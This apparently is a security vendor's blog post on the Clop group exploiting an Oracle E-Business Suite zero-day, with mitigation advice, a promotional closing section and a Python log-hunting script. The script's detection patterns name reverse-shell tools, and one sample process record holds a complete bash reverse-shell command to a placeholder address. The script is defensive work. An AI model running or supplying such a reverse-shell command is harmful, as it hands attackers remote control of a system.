In a worrying turn of events, the notorious Clop ransomware group has reportedly breached Broadcom’s systems by exploiting a critical zero-day vulnerability in Oracle’s E-Business Suite (EBS). This incident underscores how even enterprise-grade ERP platforms can become attack vectors and why organizations must stay vigilant and responsive.
What Happened
· The vulnerability in question is CVE-2025-61882, which affects the BI Publisher Integration component of Oracle EBS’s Concurrent Processing module. This flaw allows remote code execution without any authentication, making it extremely dangerous.
· According to Oracle, versions 12.2.3 through 12.2.14 of EBS are impacted.
· Threat intelligence firms report that Clop began exploiting this vulnerability around early August 2025.
· A proof-of-concept for the exploit was later publicly shared by a hacking group calling itself Scattered Lapsus$ Hunters, which leaked an archive containing Python scripts.
· Using this exploit, Clop appears to have conducted data theft from affected systems and followed up with extortion emails demanding ransom.
· Oracle responded by issuing an emergency patch, but they emphasized that customers must first apply a prior Critical Patch Update (from October 2023) before installing fixes for this zero-day.
Indicators of compromise (IOCs) shared by Oracle include suspicious IP addresses and reverse-shell commands tied to the exploit.
Why This Matters
1. High Severity: With a CVSS score of 9.8, this is one of the most critical vulnerabilities, and the lack of authentication makes it easy for attackers to exploit over a network.
2. Application-Layer Risk: Rather than targeting endpoints, Clop is exploiting enterprise applications directly. This kind of application-layer attack is increasingly common and harder to detect with traditional security tools.
3. Supply of Exploits: Because a public proof-of-concept is available, the risk is magnified: not just Clop, but possibly other threat actors can use the exploit.
4. Business Impact: Oracle EBS is widely used in critical functions such as finance, procurement, and HR, so a compromised EBS can expose highly sensitive business and operational data.
5. Urgency of Patching: Emergency patches are out, but the requirement to apply earlier updates first means some organizations may delay or misconfigure, leaving themselves exposed.
What Organizations Should Do
· Patch Immediately: Apply Oracle’s emergency fix, but make sure prerequisites (like the October 2023 Critical Patch Update) are already installed.
· Audit and Hunt: Use the IOCs shared by Oracle to search for evidence of compromise; check logs, network activity, and system behavior.
· Isolate Critical Apps: Restrict public exposure of EBS instances and ensure that only trusted networks and users can access them.
· Implement Runtime Monitoring: Monitor EBS for anomalous behavior, such as unexpected processes, reverse shells, or unusual HTTP requests.
· Incident Response Readiness: Be ready with a response plan in case of a breach. Have backups, run tabletop exercises, and validate your ability to respond quickly.
· Third-Party Risk Review: Re-evaluate how third parties integrate with your EBS. If external code or plugins are allowed in your environment, ensure they are secure and kept up to date.
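As an added illustration of the "Audit and Hunt" and "Implement Runtime Monitoring" steps above (example code, not from the original post or from Oracle), the following Python hunt scans web-server access-log lines for requests from IOC addresses and scans process-execution records for reverse-shell command signatures. The IOC addresses, log formats, and sample lines are constructed placeholders; substitute the indicators from Oracle's advisory and your own log sources.

```python
import re

# Constructed placeholder IOC addresses (TEST-NET ranges); replace with the
# suspicious IP addresses published in Oracle's advisory.
IOC_IPS = {"203.0.113.45", "198.51.100.17"}

# Shell fragments typical of reverse-shell one-liners. Detection patterns only;
# tune to your environment to limit false positives.
REVERSE_SHELL_RE = re.compile(
    r"/dev/tcp/|\bbash\s+-i\b|\bnc(?:at)?\s+.*-e\s+/bin/(?:ba)?sh|\bsocat\s+.*exec",
    re.IGNORECASE,
)

# Apache/Oracle HTTP Server combined-format access log line (assumed format).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def hunt_access_log(lines, ioc_ips=IOC_IPS):
    """Return (timestamp, ip, path, status) for every request from an IOC address.
    Malformed lines are skipped rather than raising."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group("ip") in ioc_ips:
            hits.append((m.group("ts"), m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits


def hunt_process_log(lines, ioc_ips=IOC_IPS):
    """Return process records whose command line carries a reverse-shell
    signature or references an IOC address."""
    return [l for l in lines if REVERSE_SHELL_RE.search(l) or any(ip in l for ip in ioc_ips)]


# Constructed sample input: one benign login request, one request from an IOC
# address, and one malformed line.
SAMPLE_ACCESS = [
    '10.0.5.21 - - [02/Oct/2025:10:14:03 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [02/Oct/2025:10:14:09 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 500 312 "-" "python-requests/2.31"',
    "malformed entry",
]

# Constructed process-execution records (auditd-style, simplified).
SAMPLE_PROC = [
    'uid=applmgr pid=30211 cmd="/bin/sh -c ls /u01/app"',
    'uid=applmgr pid=30294 cmd="sh -c bash -i >& /dev/tcp/203.0.113.45/443 0>&1"',
    'uid=applmgr pid=30301 cmd="java -jar ./patch_tool.jar"',
]

if __name__ == "__main__":
    for hit in hunt_access_log(SAMPLE_ACCESS):
        print("IOC request:", hit)
    for rec in hunt_process_log(SAMPLE_PROC):
        print("suspicious process:", rec)
```

Any hit from either function should be treated as a trigger for the incident-response plan, not as conclusive proof; correlate it with the EBS application logs and the full IOC list before acting.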
Conclusion
This Clop attack via Oracle EBS’s zero-day vulnerability is a reminder that no system is immune, no matter how mature or mission-critical. As threat actors shift their focus to enterprise applications, the traditional perimeter-based defense is no longer enough. Organizations must stay proactive: patch swiftly, monitor deeply, and prepare for the worst.
About COE Security
At COE Security, we help businesses across finance, healthcare, manufacturing, cloud services, and government sectors strengthen their cybersecurity and compliance posture. When it comes to high-risk environments like enterprise resource planning systems, we offer:
· Rapid vulnerability assessments and penetration testing
· Runtime protection and behavior monitoring for critical applications
· Compliance support for frameworks like ISO 27001, SOC 2, GDPR, HIPAA, and PCI DSS
· Incident response planning, tabletop exercises, and on-demand expertise
· Continuous threat intelligence to stay ahead of emerging cyber risks
Trust us to secure your infrastructure while you focus on your core business.
Stay Cyber Safe
Follow COE Security on LinkedIn for regular updates, threat insights, and compliance guidance so you can stay informed and protected.